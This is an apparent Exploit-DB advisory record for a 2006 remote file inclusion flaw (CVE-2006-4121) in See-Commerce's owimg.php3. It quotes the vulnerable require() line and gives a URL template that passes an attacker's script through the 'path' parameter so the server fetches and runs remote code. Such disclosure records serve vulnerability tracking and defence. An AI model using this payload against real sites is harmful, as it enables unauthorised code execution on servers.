See-Commerce <= 1.0.625 owimg.php3 Remote Include Vulnerability

2006-08-09T00:00:00
ID EDB-ID:2155
Type exploitdb
Reporter Drago84
Modified 2006-08-09T00:00:00

Description

See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability. CVE-2006-4121. Webapps exploit for php platform

                                        
                                            See-Commerce Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip

Problem Is:
require($path."/ow.inc");

Page Affect:
http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]

Greatz : Str0ke

# milw0rm.com [2006-08-09]